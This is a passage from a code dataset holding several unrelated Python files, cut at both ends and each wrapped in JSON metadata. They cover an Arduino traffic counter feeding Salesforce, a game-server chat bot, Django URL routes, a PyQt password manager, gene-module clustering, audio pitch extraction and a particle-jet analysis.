= medsubset[i]\n medminindex = currhour + i\n\n highminindex = currhour\n highmin = highsubset[0]\n for i in range(len(highsubset)):\n if highsubset[i] < highmin:\n highmin = medsubset[i]\n highminindex = currhour + i\n #print(highminindex)\n\n #print(str(medmin) + \", \" + str(medminindex))\n #print(str(highmin) + \", \" + str(highminindex))\n sf.Best_Hour__c.update(bhid, {\"LowMedium_Priority__c\": medminindex, \"High_Priority__c\": highminindex, \"Crit_Priority__c\": currhour})\n\n # saves the array to local file\n with open(\"hourrecord.txt\", \"w\") as f:\n for i in fullday:\n f.write(str(i) + \"\\n\")\n\n\n# loop to read data from USB and send to org\n\ndef lowerTraffic():\n threading.Timer(15, lowerTraffic).start()\n global carCount, sensorCount\n if carCount > 0:\n carCount -= 1\n sensorCount -= 100\n sf.Traffic_Status__e.create({\"Car_Rate__c\": carCount, \"Sensor_Name__c\": \"pe test\"})\n sf.Traffic_Tracker__c.update(ttid, {\"Car_Rate__c\": carCount})\n print('Traffic rate lowered to: ' + str(carCount))\n\n#lowerTraffic()\nbestHour()\n\n# Initialize platform event record and reset object record\nsf.Traffic_Status__e.create({\"Car_Rate__c\": carCount, \"Sensor_Name__c\": \"pe test\"})\nsf.Traffic_Tracker__c.update(ttid, {\"Car_Rate__c\": 0})\n\nwhile True:\n # reads in serial data, strips it, and decodes it\n rawdata = (arduinoData.readline().strip())\n data = int(rawdata.decode('utf-8'))\n # extra print statement for viewing live da ta/debugging\n #print(data)\n\n # checks to see if object is <= 10cm from sensor and in front of sensor for > 1s\n if data <= 10:\n sensorCount += 1\n if sensorCount %80 == 0:\n carCount = int(sensorCount/80);\n print('Car detected, cars counted is: ' + str(carCount))\n totalCars += 1\n\n # ~~~THE MAGIC LINE OF CODE~~~\n # upserts a platform event of type traffic_status__e into the org, using # of cars counted as a parameter\n sf.Traffic_Status__e.create({\"Car_Rate__c\": carCount, \"Sensor_Name__c\": \"pe test\"})\n sf.Traffic_Tracker__c.update(ttid, {\"Car_Rate__c\": carCount})\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n print('Platform Event and Object successfully upserted')\n currentDT = datetime.datetime.now()\n sf.Car__c.create({\"Name\": 'c' + str(totalCars), \"Location__c\": 'Reston', \"Hour__c\": currentDT.strftime(\"%H\"), \"Timestamp__c\": currentDT.strftime(\"%H:%M:%S\")})\n #print('Car timestamp record successfully created')\n\n #increments cars within the hour\n fullday[int(currentDT.strftime(\"%H\"))] += 1","sub_path":"Serial Stream.py","file_name":"Serial Stream.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"288649302","text":"\"\"\"\nNeed to change unicode string to normal string, otherwise translate won't work\n\"\"\"\nclass Solution(object):\n def mostCommonWord(self, paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n paragraph = paragraph.encode('ascii','ignore')\n pureWords = paragraph.translate(None, \"!?',;.\")\n counter = {}\n for word in pureWords.split(\" \"):\n lower = word.lower()\n if lower not in banned:\n if lower not in counter:\n counter[lower] = 1\n else:\n counter[lower] += 1\n return max(counter, key= counter.get)\n","sub_path":"solution/python/819.py","file_name":"819.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"586600106","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport logging\nimport asyncio\nimport sys\nimport json\nimport time\nimport weakref\nimport traceback\nimport textwrap\n\nfrom .AsyncClient import AsyncClient\n\nfrom .SourceModAPI import SourceModAPI\nfrom .Subscribe import GameEvents, Forwards\n\nfrom .Utils import Utils\nfrom .Config import Config\nfrom .CommandHandler import CommandHandler\nfrom .AccessManager import AccessManager\nfrom .PlayerManager import PlayerManager\nfrom .AudioManager import AudioManager\n\nclass Torchlight():\n\tdef __init__(self, master):\n\t\tself.Logger = logging.getLogger(__class__.__name__)\n\t\tself.Master = master\n\t\tself.Config = self.Master.Config\n\t\tself.WeakSelf = weakref.ref(self)\n\n\t\tself.API = SourceModAPI(self.WeakSelf)\n\t\tself.GameEvents = GameEvents(self.WeakSelf)\n\t\tself.Forwards = Forwards(self.WeakSelf)\n\n\t\tself.DisableVotes = set()\n\t\tself.Disabled = 0\n\t\tself.LastUrl = None\n\n\tdef InitModules(self):\n\t\tself.Access = AccessManager()\n\t\tself.Access.Load()\n\n\t\tself.Players = PlayerManager(self.WeakSelf)\n\n\t\tself.AudioManager = AudioManager(self.WeakSelf)\n\n\t\tself.CommandHandler = CommandHandler(self.WeakSelf)\n\t\tself.CommandHandler.Setup()\n\n\t\tself.GameEvents.HookEx(\"server_spawn\", self.Event_ServerSpawn)\n\t\tself.GameEvents.HookEx(\"player_say\", self.Event_PlayerSay)\n\n\tdef SayChat(self, message, player=None):\n\t\tmessage = \"\\x0700FFFA[Torchlight]: \\x01{0}\".format(message)\n\t\tif len(message) > 976:\n\t\t\tmessage = message[:973] + \"...\"\n\t\tlines = textwrap.wrap(message, 244, break_long_words = True)\n\t\tfor line in lines:\n\t\t\tasyncio.ensure_future(self.API.PrintToChatAll(line))\n\n\t\tif player:\n\t\t\tLevel = 0\n\t\t\tif player.Access:\n\t\t\t\tLevel = player.Access[\"level\"]\n\n\t\t\tif Level < self.Config[\"AntiSpam\"][\"ImmunityLevel\"]:\n\t\t\t\tcooldown = len(lines) * self.Config[\"AntiSpam\"][\"ChatCooldown\"]\n\t\t\t\tif player.ChatCooldown > self.Master.Loop.time():\n\t\t\t\t\tplayer.ChatCooldown += cooldown\n\t\t\t\telse:\n\t\t\t\t\tplayer.ChatCooldown = self.Master.Loop.time() + cooldown\n\n\tdef SayPrivate(self, player, message):\n\t\tmessage = \"\\x0700FFFA[Torchlight]: \\x01{0}\".format(message)\n\t\tif len(message) > 976:\n\t\t\tmessage = message[:973] + \"...\"\n\t\tlines = textwrap.wrap(message, 244, break_long_words = True)\n\t\tfor line in lines:\n\t\t\tasyncio.ensure_future(self.API.PrintToChat(player.Index, line))\n\n\tdef Reload(self):\n\t\tself.Config.Load()\n\t\tself.CommandHandler.NeedsReload = True\n\n\tasync def Send(self, data):\n\t\treturn await self.Master.Send(data)\n\n\tdef OnPublish(self, obj):\n\t\tif obj[\"module\"] == \"gameevents\":\n\t\t\tself.GameEvents.OnPublish(obj)\n\t\telif obj[\"module\"] == \"forwards\":\n\t\t\tself.Forwards.OnPublish(obj)\n\n\tdef Event_ServerSpawn(self, hostname, address, ip, port, game, mapname, maxplayers, os, dedicated, password):\n\t\tself.DisableVotes = set()\n\t\tself.Disabled = 0\n\n\tdef Event_PlayerSay(self, userid, text):\n\t\tif userid == 0:\n\t\t\treturn\n\n\t\tPlayer = self.Players.FindUserID(userid)\n\t\tasyncio.ensure_future(self.CommandHandler.HandleCommand(text, Player))\n\n\tdef __del__(self):\n\t\tself.Logger.debug(\"~Torchlight()\")\n\n\nclass TorchlightHandler():\n\tdef __init__(self, loop):\n\t\tself.Logger = logging.getLogger(__class__.__name__)\n\t\tself.Loop = loop if loop else asyncio.get_event_loop()\n\t\tself._Client = None\n\t\tself.Torchlight = None\n\t\tself.Config = Config()\n\n\t\tasyncio.ensure_future(self._Connect(), loop = self.Loop)\n\n\tasync def _Connect(self):\n\t\t# Connect to API\n\t\tself._Client = AsyncClient(self.Loop, self.Config[\"SMAPIServer\"][\"Host\"], self.Config[\"SMAPIServer\"][\"Port\"], self)\n\t\tawait self._Client.Connect()\n\n\t\tself.Torchlight = Torchlight(self)\n\n\t\t# Pre Hook for late load\n\t\tawait self.Torchlight.GameEvents._Register([\"player_connect\", \"player_activate\"])\n\t\tawait self.Torchlight.Forwards._Register([\"OnClientPostAdminCheck\"])\n\n\t\tself.Torchlight.InitModules()\n\n\t\t# Late load\n\t\tawait self.Torchlight.GameEvents.Replay([\"player_connect\", \"player_activate\"])\n\t\tawait self.Torchlight.Forwards.Replay([\"OnClientPostAdminCheck\"])\n\n\tasync def Send(self, data):\n\t\treturn await self._Client.Send(data)\n\n\tdef OnPublish(self, obj):\n\t\tself.Torchlight.OnPublish(obj)\n\n\tdef OnDisconnect(self, exc):\n\t\tself.Logger.info(\"OnDisconnect({0})\".format(exc))\n\t\tself.Torchlight = None\n\n\t\tasyncio.ensure_future(self._Connect(), loop = self.Loop)\n\n\tdef __del__(self):\n\t\tself.Logger.debug(\"~TorchlightHandler()\")\n","sub_path":"Torchlight/Torchlight.py","file_name":"Torchlight.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"105384297","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index,name=\"index\"),\n\turl(r'NutritionGuide',views.NutritionGuide,name=\"NutritionGuide Guide\"),\n\turl(r'Resources',views.resources,name=\"Resources\"),\n\turl(r'FoodMap',views.foodMap,name=\"Food Map\"),\n\turl(r'DietaryInfo',views.dietaryInfo,name=\"DietaryInfo\"),\n\turl(r'menu/(?P(\\w*\\W*)+)',views.menu, name=\"Menu\")\n]\n","sub_path":"GuelphFoodGuide/GuelphFoodGuideSite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"363771109","text":"# Life is short, use Python\n# ---- utf-8 ----\n# @Time : 2018/5/22 11:00\n# @Author : Gao DongShan\n# @File : main_menu.py\n# @Start :-----------------\n\n\nimport sys\nfrom PyQt5.QtWidgets import QMainWindow, QMenu, qApp, QTableView\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.uic import loadUi\nfrom PyQt5.QtCore import QCoreApplication, Qt\nfrom PyQt5.QtSql import QSqlTableModel, QSqlDatabase, QSqlQuery\n\nID, SITE, NAME, PASS, REMARK = range(5)\n\n\nclass MainMenu(QMainWindow):\n\n def __init__(self, parent=None):\n super(MainMenu, self).__init__(parent)\n\n # ----------------- UI --------------------------#\n loadUi(\"./UI/main_ui.ui\", self)\n self.setWindowTitle(\"密码保险柜\")\n self.setWindowIcon(QIcon(\"./image/1.ico\"))\n\n # ----------------- 按键 --------------------------#\n self.pushButtonExit.clicked.connect(QCoreApplication.instance().quit)\n self.pushButtonDel.clicked.connect(self.delete)\n self.pushButtonAdd.clicked.connect(self.add)\n self.refresh.clicked.connect(self.reselect)\n\n # ----------------- db --------------------------#\n self.db = QSqlDatabase.addDatabase(\"QSQLITE\")\n self.db.setDatabaseName(\"./db/word.db\")\n\n # ----------------- model --------------------------#\n self.model = QSqlTableModel()\n self.model.setTable(\"warehouse\")\n self.model.setSort(ID, Qt.AscendingOrder)\n self.model.setHeaderData(ID, Qt.Horizontal, \"ID\")\n self.model.setHeaderData(SITE, Qt.Horizontal, \"站点\")\n self.model.setHeaderData(NAME, Qt.Horizontal, \"账号\")\n self.model.setHeaderData(PASS, Qt.Horizontal, \"密码\")\n self.model.setHeaderData(REMARK, Qt.Horizontal, \"备注\")\n self.model.setEditStrategy(QSqlTableModel.OnFieldChange)\n\n # ----------------- tableView --------------------------#\n self.tableView.setModel(self.model)\n self.tableView.horizontalHeader().setStretchLastSection(True)\n\n # ----------------- query --------------------------#\n self.query = QSqlQuery()\n\n def contextMenuEvent(self, event):\n cmenu = QMenu()\n quitAct = cmenu.addAction(\"退出\")\n action = cmenu.exec_(self.mapToGlobal(event.pos()))\n if action == quitAct:\n qApp.quit()\n\n def add(self):\n self.query.exec(\"insert into `warehouse` VALUES (NULL ,'example.com','example','example','example')\")\n self.reselect()\n rows = self.model.rowCount()\n self.tableView.selectRow(rows)\n\n def delete(self):\n row = self.tableView.currentIndex().row()\n site_id = self.model.data(self.model.index(row, 0))\n sql = \"delete from `warehouse` where id =\" + str(site_id)\n self.query.exec(sql)\n self.reselect()\n\n def reselect(self):\n if self.model.data(self.model.index(self.model.rowCount(), 0)) != \"\":\n self.model.select()\n","sub_path":"main_menu.py","file_name":"main_menu.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"130659259","text":"__author__ = 'ayal'\n\nfrom celery.task import task\nfrom mapreduce.mrMap import dtToMonthly\nfrom mapreduce.__init__ import usageConfig\n\ndef maxCircuit(db, dt, group, clampers):\n\n def _getPrevMonth():\n prevMonth = dt.month - 1\n if dt.month == 1: prevMonth = 12\n query = {\"month\": prevMonth,\"year\":dt.year, \"groupid\": group}\n return db[\"monthlyCircuitDemand\"].find(query)\n\n prevInfo = _getPrevMonth()\n siteid = clampers[0][\"siteid\"]\n groupInfo = ({\"amps\": x[\"maxamps\"], \"clamperid\":[\"clamperid\"]} for x in clampers)\n currentMax = max(x[\"amps\"] for x in groupInfo)\n numMonths = 1\n prevailingMax = currentMax\n\n if prevInfo != None:\n prevailingMax = prevInfo[\"maxprevailing\"]\n numMonths = prevInfo[\"nummonths\"]\n if currentMax > prevailingMax:\n prevailingMax = currentMax\n numMonths = 1\n elif currentMax < prevailingMax:\n if numMonths == 3:\n numMonths = 1\n prevailingMax = currentMax\n else: numMonths += 1\n doc = {\"siteid\":siteid, \"groupid\": group, \"month\": dt.month, \"year\": dt.year,\n \"maxReadings\": list(groupInfo),\n \"nummonths\": numMonths, \"prevailingmax\": prevailingMax}\n return doc\n\n@task\ndef groupMaxAmpsSchedule(db, r, dt):\n\n def _getCircuitsForGroups():\n groups = r.smembers(\"groups\")\n vals = []\n for group in groups:\n hashKey = \"group:%s:clampers\" % group\n devcs = r.smembers(hashKey)\n vals.append({\"group\": group, \"clampers\": devcs})\n return vals\n\n fromAndTo = dtToMonthly(dt)\n fromStamp = fromAndTo[0]\n toStamp = fromAndTo[1]\n docs = []\n groups = _getCircuitsForGroups()\n for group in groups:\n clampers = map(int, list(group[\"clampers\"]))\n query = {\"fromstamp\":{\"$gte\":fromStamp, \"$lte\":toStamp}, \"clamperid\":{\"$in\": clampers}}\n vals = db[usageConfig.mongo_collections['clamper_monthly_usage']].find(query)\n doc = maxCircuit(db, dt, group, vals)\n docs.append(doc)\n db[\"monthlyCircuitDemand\"].insert(docs)","sub_path":"mapreduce/maxAmpRoutine.py","file_name":"maxAmpRoutine.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"44384663","text":"import dgl\nimport torch\nimport numpy as np\nimport pandas as pd \nfrom sklearn.cluster import KMeans\nfrom metrics import *\nimport scipy\n\ndata_name = [\"ecoli_colombos\", \"ecoli_dream5\", \"yeast_gpl2529\", \n\"yeast_dream5\", \"synth_ecoli\", \"synth_yeast\"]\n\n# 加载数据\ndef load_data(path):\n print('loading '+path.split('/')[-2]+'...')\n feature = np.load(path+'feat.npy')\n g = dgl.DGLGraph()\n src,dst,weight= [],[],[]\n with open(path+'coexp_net.txt','r') as file:\n for line in file:\n a,b,w = int(line.split()[0]),int(line.split()[1]),float(line.split()[2])\n src.append(a)\n dst.append(b)\n weight.append(w)\n g.add_nodes(feature.shape[0]) # 添加节点\n g.add_edges(src+dst,dst+src) # 添加双向边\n dgl.add_self_loop(g) \n g.ndata['feat'] = torch.FloatTensor(feature)\n g.edata['weight'] = torch.FloatTensor(weight+weight)\n\n id_gene,gene_id = {},{}\n with open(path+'id_gene.txt','r') as file:\n for line in file:\n num,gene = int(line.split()[0]),line.split()[1]\n id_gene[num] = gene\n gene_id[gene] = num \n return id_gene,gene_id,g\n\n# 提前结束,保存模型\nclass EarlyStopping(object):\n def __init__(self, args):\n self.filename = args.path+'model.pth'\n self.patience = args.patience\n self.counter = 0\n self.best_loss = None\n self.early_stop = False\n\n def step(self, loss, model):\n if self.best_loss is None:\n self.best_loss = loss\n self.save_checkpoint(model)\n elif (loss > self.best_loss):\n self.counter += 1\n # print(f'EarlyStopping counter: {self.counter} out of {self.patience}')\n if self.counter >= self.patience:\n self.early_stop = True\n else:\n if (loss <= self.best_loss):\n self.save_checkpoint(model)\n self.best_loss = np.min((loss, self.best_loss))\n self.counter = 0\n return self.early_stop\n\n def save_checkpoint(self, model):\n \"\"\"Saves model when validation loss decreases.\"\"\"\n torch.save(model.state_dict(), self.filename)\n\n def load_checkpoint(self, model):\n \"\"\"Load the latest checkpoint.\"\"\"\n model.load_state_dict(torch.load(self.filename))\n\n# transform affiliation matrix into N*m\ndef cal_matrix(minimal_path,gene):\n minimal = pd.read_json(minimal_path)\n tmp = minimal.values.reshape(minimal.shape[0]*minimal.shape[1],)\n tmp = np.array(list(set(tmp)))\n gene_mark = [elem in tmp for elem in gene]\n\n data = minimal.T.apply(pd.value_counts)\n data = pd.DataFrame(data,index = gene)\n matrix = np.array(data)\n matrix[np.isnan(matrix)] = 0\n return matrix[gene_mark],gene_mark \n\n# kmean\ndef kmean(feat,n_clusters = 100):\n knn = KMeans(n_clusters = n_clusters,init = 'k-means++',n_init = 10,max_iter = 300,random_state=0)\n knn.fit(feat)\n matrix = np.zeros((feat.shape[0],n_clusters))\n for i in range(feat.shape[0]):\n matrix[i][knn.labels_[i]] = 1\n return matrix\n\n# hcluster\ndef hcluster(feat, n_cluster=100,metric='euclidean',method='ward'):\n import scipy.cluster.hierarchy as hcl\n\n disMat = hcl.distance.pdist(X = feat, metric=metric)\n linkage = hcl.linkage(disMat, method='ward')\n # hcluster.dendrogram(linkage, leaf_font_size=10.)\n labels = hcl.fcluster(linkage, n_cluster, criterion='maxclust')\n matrix = np.zeros((feat.shape[0],n_cluster))\n for i in range(labels.shape[0]):\n matrix[i][labels[i]-1] = 1\n return matrix\n\n# 计算相似度\ndef simdist(emb, simdist_function=\"pearson_correlation_abs\", similarity=True, **kwargs):\n choices = {\n \"pearson_correlation\": lambda emb: np.corrcoef(emb),\n \"pearson_correlation_abs\": lambda emb: np.abs(np.corrcoef(emb))\n }\n\n func = choices[simdist_function]\n simdist_matrix = func(emb)\n\n if similarity == True:\n pass\n else:\n simdist_matrix = (-simdist_matrix) + simdist_matrix.max().max()\n print(simdist_matrix)\n return simdist_matrix\n \n# adjust matrix\ndef adjust(matrix,mark,top_k = 3):\n tmp = matrix[mark]\n mark_2 = np.where(tmp.sum(0) >= top_k)[0]\n tmp = tmp[:,mark_2]\n return tmp\n\n# 计算F1score 和 Nmi 指标\ndef cal_metric(args):\n gene_id = {}\n with open(args.path+'id_gene.txt','r') as file:\n for line in file:\n num,gene = int(line.split()[0]),line.split()[1]\n gene_id[gene] = num \n\n data = args.path.split('/')[-2]\n print(type(data_name[0]))\n minimal_path,strict_path = args.path+'knownmodules/minimal.json',args.path+'knownmodules/strict.json'\n minimal_matrix,minimal_mark = cal_matrix(minimal_path,gene_id.keys())\n strict_matrix,strict_mark = cal_matrix(strict_path,gene_id.keys())\n \n emb = np.load(args.path+'emb.npy')\n\n # 数据标准化\n eps = 1e-5\n mu = np.mean(emb,axis = 0)\n sigma = np.std(emb,axis = 0)\n tmp = (emb - mu) / (sigma + eps)\n\n print('deepgmd_cluster:')\n matrix = hcluster(tmp,args.k)\n res_minimal = adjust(matrix,minimal_mark,top_k = 3)\n res_strict = adjust(matrix,strict_mark,top_k = 3)\n\n relevance,recovery = cal_overlap(res_minimal,minimal_matrix)\n nmi = cal_nmi(res_minimal,minimal_matrix)\n print(\"minimal: F1 score:{:.4f} nmi:{:.4f}\".format((relevance+recovery)/2,nmi))\n relevance,recovery = cal_overlap(res_strict,strict_matrix)\n nmi = cal_nmi(res_strict,strict_matrix)\n print(\"strict: F1 score:{:.4f} nmi:{:.4f}\".format((relevance+recovery)/2,nmi))\n\n print('deepgmd:')\n matrix = emb\n matrix[matrix > args.threshold] = 1\n matrix[matrix < args.threshold] = 0\n res_minimal = adjust(matrix,minimal_mark,top_k = 3)\n res_strict = adjust(matrix,strict_mark,top_k = 3)\n\n relevance,recovery = cal_overlap(res_minimal,minimal_matrix)\n nmi = cal_nmi(res_minimal,minimal_matrix)\n print(\"minimal: F1 score:{:.4f} nmi:{:.4f}\".format((relevance+recovery)/2,nmi))\n relevance,recovery = cal_overlap(res_strict,strict_matrix)\n nmi = cal_nmi(res_strict,strict_matrix)\n print(\"strict: F1 score:{:.4f} nmi:{:.4f}\".format((relevance+recovery)/2,nmi))","sub_path":"code/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"111079000","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def constructMaximumBinaryTree(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n length = len(nums)\n if length > 1000 or length <= 0:\n return\n\n return self.getSubTtree(nums, 0, length)\n\n def getSubTtree(self, nums, start, end):\n if start >= end:\n return None\n max_val = max(nums[start: end])\n node = TreeNode(max_val)\n node.left = self.getSubTtree(nums, start, nums.index(max_val))\n node.right = self.getSubTtree(nums, nums.index(max_val) + 1, end)\n return node\n\n\nclass Solution2(object):\n def constructMaximumBinaryTree(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n if not nums:\n return None\n max_val = max((nums))\n node = TreeNode(max_val)\n i = nums.index(max_val)\n if nums[:i]:\n node.left = self.constructMaximumBinaryTree(nums[:i])\n if nums[i + 1:]:\n node.right = self.constructMaximumBinaryTree(nums[i + 1:])\n return node\n","sub_path":"Repo/654_Maximum_Binary_Tree.py","file_name":"654_Maximum_Binary_Tree.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"483702425","text":"s = input()\nk = int(input())\n\ncnt = 0\nalps = 'abcdefghijklmnopqrstuvwxyz'\nfor alp in alps:\n inds = []\n for i,si in enumerate(s):\n if si == alp:\n inds.append(i)\n if inds:\n s_set = set()\n for ind in inds:\n for i in range(1,6):\n if ind+i <= len(s):\n s_set.add(s[ind:ind+i])\n sl = list(s_set)\n if cnt + len(sl) >= k:\n sl.sort()\n print(sl[k-cnt-1])\n exit()\n else:\n cnt += len(sl)\n","sub_path":"3_virtual_contest/asa_0809/arc097_a.py","file_name":"arc097_a.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"208371619","text":"import sys\n\nfilename = sys.argv[1]\nfile = open(filename, 'r')\n\nnodeMap = {}\n\nfor line in file:\n split = line.split(\"<->\")\n host = int(split[0])\n targets = split[1]\n nodeMap[host] = []\n for target in targets.split(\",\"):\n target = int(target.strip())\n nodeMap[host].append(target)\n\ndef bfs(node, nodeMap):\n visited = {}\n queue = [node]\n while len(queue) > 0:\n node = queue.pop()\n\n if node in visited:\n continue\n\n visited[node] = True\n\n for child in nodeMap[node]:\n if child not in visited:\n queue.append(child)\n\n return len(visited)\n\nprint(bfs(0, nodeMap))\n","sub_path":"2017/day12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"511925381","text":"# coding=utf8\n\nimport sys, re, logging, os, random, urllib2, hashlib, time, wave, struct, traceback\n\nimport numpy as np\nimport scipy\n\nfrom common import VoiceEntry, Song, VocalPitch, \\\n\t\tget_sqla_session, SCRIPT_DIR, SOUND_DEPTH, iframes_to_frames, frames_to_iframes, \\\n\t\tMAX_SAMPLE_VAL, MIN_SAMPLE_VAL, \\\n\t\tget_dominant_pitch\n\n\n__llevel = logging.DEBUG\nlogging.basicConfig( format=\"%(asctime)s [%(levelname)s] %(message)s\" )\nLOG = logging.getLogger(\"simple_logger\")\nLOG.setLevel( __llevel )\n\n\n#from pylab import plot, show, title, xlabel, ylabel, subplot\n\nCHUNK_SIZE = 8192 * 2\nCHUNK_OVERLAP = 1024\n\n\n\n\ndef get_pitch_list( iframes, srate, chunk_size, overlap ):\n\t# based on http://glowingpython.blogspot.pt/2011/08/how-to-plot-frequency-spectrum-with.html\n\t#\n\tiframes_nparr = np.array( iframes )\n\n\tpitch_list = list()\n\n\tfor i in range(0, len(iframes_nparr), chunk_size):\n#\t\tsubplot(2,1,1)\n#\t\tplot( np.array(range(i,i+CHUNK_SIZE))/float(srate), iframes_nparr[ i:(i+chunk_size) ])\n#\t\txlabel('Time')\n#\t\tylabel('Amplitude')\n#\t\tsubplot(2,1,2)\n#\t\tplot(freqs,abs(Z),'r') # plotting the spectrum\n#\t\txlabel('Freq (Hz)')\n#\t\tylabel('|Y(freq)|')\n#\t\tshow()\n#\t\tsys.stdin.read(1)\n\n\t\tdom_pitch_info = get_dominant_pitch( iframes_nparr, i, srate, chunk_size, overlap )\n\t\tif dom_pitch_info:\n\t\t\tfreq, mag = dom_pitch_info\n\t\t\tpitch_list.append( (i,freq,mag) )\n\n\treturn pitch_list\t\n\n\t\t\n\t\t\t\t\n\t\t\n\t\t\n\n\n\ndef gen_vocal_pitches( session, song_title, vsong_path ):\n\tsong = session.query( Song ).get( song_title )\n\tif song is None:\n\t\tLOG.error( \"song not found!\" )\n\t\traise Exception()\n\n\tnchannels = 1\n\tsrate = 44100\n\tsdepth = 2\n\n\tchunk_size = CHUNK_SIZE\n\tchunk_overlap = CHUNK_OVERLAP\n\n\tsong_wav = wave.open( song.path, \"rb\" )\n\tif song_wav.getnchannels() != nchannels or song_wav.getframerate() != srate or song_wav.getsampwidth() != sdepth:\n\t\tLOG.error( \"Target song: unsupported format\" )\n\t\traise Exception()\n\tsong_wav.close()\n\n\tvsong_wav = wave.open( vsong_path, \"rb\" )\n\tif vsong_wav.getnchannels() != nchannels or vsong_wav.getframerate() != srate or vsong_wav.getsampwidth() != sdepth:\n\t\tLOG.error( \"Target song: unsupported format\" )\n\t\traise Exception()\n\n\tvsong_length = vsong_wav.getnframes()\n\tvsong_iframes = frames_to_iframes( vsong_wav.readframes( vsong_length ) )\n\n\tpitch_list = get_pitch_list( vsong_iframes, srate, chunk_size, chunk_overlap )\n\n\tsession.query( VocalPitch ).filter( VocalPitch.song_title == song.title ).delete()\n\tfor idx,freq,mag in pitch_list:\n\t\tvocal_pitch = VocalPitch()\n\t\tvocal_pitch.song_title = song.title\n\t\tvocal_pitch.n_start = idx\n\t\tvocal_pitch.n_end = (idx + chunk_size)\n\t\tvocal_pitch.frequency = freq\n\t\tsession.add( vocal_pitch )\n\t\t\n\n\n\n\ndef do_it( song_title, vsong_path ):\n\tsession = get_sqla_session()\n\ttry:\n\t\tgen_vocal_pitches( session, song_title, vsong_path )\n\t\tsession.commit()\n\texcept Exception:\n\t\ttraceback.print_exc()\n\t\tsession.rollback()\t\n\tsession.close()\n\n\n\n\n\nsong_title = sys.argv[1]\nvsong_path = sys.argv[2]\ndo_it( song_title, vsong_path )\n","sub_path":"gen_vocal_pitches.py","file_name":"gen_vocal_pitches.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"319560734","text":"from django.core.management import BaseCommand\nimport iidxrank.models as models\nimport update.updatedb as updatedb\n\nclass Command(BaseCommand):\n help = \"update all song db from textage.cc\"\n\n def add_arguments(self, parser):\n parser.add_argument('--set_version', type=int, help='specific version of song version')\n parser.add_argument('--test', type=int, help='only for test (not actually update record)')\n\n def handle(self, *args, **options):\n version = -1\n if (options['set_version']):\n version = options['set_version']\n if (options['test']):\n updatedb.TEST = options['test']\n updatedb.update_from_textage(version)\n","sub_path":"update/management/commands/updateSongTextage.py","file_name":"updateSongTextage.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"504232166","text":"NUMBER_OF_BUCKETS = 10 # number of buckets in index list\r\nMAX_PAGES = 5 # number of pages to crawl\r\n\r\n\r\ndef get_page(url):\r\n try:\r\n import urllib\r\n return urllib.urlopen(url).read()\r\n except:\r\n return \"\"\r\n\r\n\r\ndef union(p, q):\r\n for e in q:\r\n if e not in p:\r\n p.append(e)\r\n\r\n\r\ndef get_next_target(page):\r\n start_link = page.find(' math.pi):\n phi -= 2*math.pi\n # print(\"new again phi: %f\" % phi)\n eta = eta-etajet\n # print('phi after centre: %f' % phi)\n\n return phi, eta\n\ndef findMaxSubmax(jEvent, pEvent, j, histsubmaxcheck):\n maxm = jEvent.pIndex[j][0]\n\n for k, index in enumerate(jEvent.pIndex[j]):\n#index will give the particle index, eg [7, 21, 32], k gives 0, 1, 2\n # print(\"\\t\\t\\tpt[%d] = %f\" % (jEvent.pIndex[j][k], pEvent.pt[jEvent.pIndex[j][k]]))\n #events[0].pt[event[1].pIndex[j][k]] #how to tap into event number on other tree\n #tree.event.pt[event.pIndex[j][k]] #how to tap into event number on other tree\n \n #finding the particle in the jet with the highest pt\n if pEvent.pt[jEvent.pIndex[j][k]] > pEvent.pt[maxm]:\n maxm = jEvent.pIndex[j][k]\n # print(\"\\t\\tmax: %d\" % maxm)\n phi_maxm = getPhi(pEvent, maxm)\n eta_maxm = getEta(pEvent, maxm)\n submax = 0\n phi_submax = 0\n eta_submax = 0\n if(len(jEvent.pIndex[j])>1):\n if (maxm == jEvent.pIndex[j][0]):\n submax = jEvent.pIndex[j][1]\n else:\n submax = jEvent.pIndex[j][0]\n for k, index in enumerate(jEvent.pIndex[j]): #finding the particle in the jet with the second highest pt\n\n if ((pEvent.pt[submax] < pEvent.pt[jEvent.pIndex[j][k]]) and (pEvent.pt[jEvent.pIndex[j][k]] < pEvent.pt[maxm])):\n submax = 